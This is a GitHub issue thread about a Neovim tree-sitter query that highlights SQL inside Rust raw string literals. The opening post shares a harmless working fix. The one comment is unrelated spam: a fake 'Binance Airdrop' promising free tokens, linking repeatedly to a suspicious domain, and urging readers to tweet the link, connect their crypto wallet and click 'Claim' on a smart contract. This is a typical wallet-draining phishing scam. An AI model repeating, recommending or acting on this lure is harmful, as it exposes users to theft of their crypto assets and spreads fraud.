### ISSUE TITLE
SQL rust language injection no longer working for raw string literals

### ISSUE THREAD

**Issue by paul-hansen** [smbl64/dotfiles#1]
I found the guide on your website here:
https://banisaeid.com/posts/rust-highlight-sql/
It wasn't working for raw string literals for me though. I see you are still using what you have on the website [here](https://github.com/smbl64/dotfiles/blob/master/nvim/after/queries/rust/injections.scm).

After some tinkering I found a fix so I thought I would share.
```clojure
; extends
; Adapted from https://banisaeid.com/posts/rust-highlight-sql/
((string_literal) @sql
 (#match? @sql "(SELECT|select|INSERT|insert|UPDATE|update|DELETE|delete).+(FROM|from|INTO|into|VALUES|values|SET|set).*(WHERE|where|GROUP BY|group by)?")
 (#offset! @sql 0 1 0 -1))

((raw_string_literal) @sql
 (#match? @sql "(SELECT|select|INSERT|insert|UPDATE|update|DELETE|delete).+(FROM|from|INTO|into|VALUES|values|SET|set).*(WHERE|where|GROUP BY|group by)?")
 (#offset! @sql 0 3 0 -2))

```

My theory is the offset needed to be different for raw strings so it skips the `r#"` and `"#`. I'm having a hard time finding documentation for this stuff though so my logic could be off, does seem to work though:
![image](https://github.com/smbl64/dotfiles/assets/7019130/846efb72-85b7-4ecc-969f-f35b5111b715)

Feel free to close this issue as you see fit. Thanks for the guide, it got me most of the way there!

**Comment by softuvo** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.
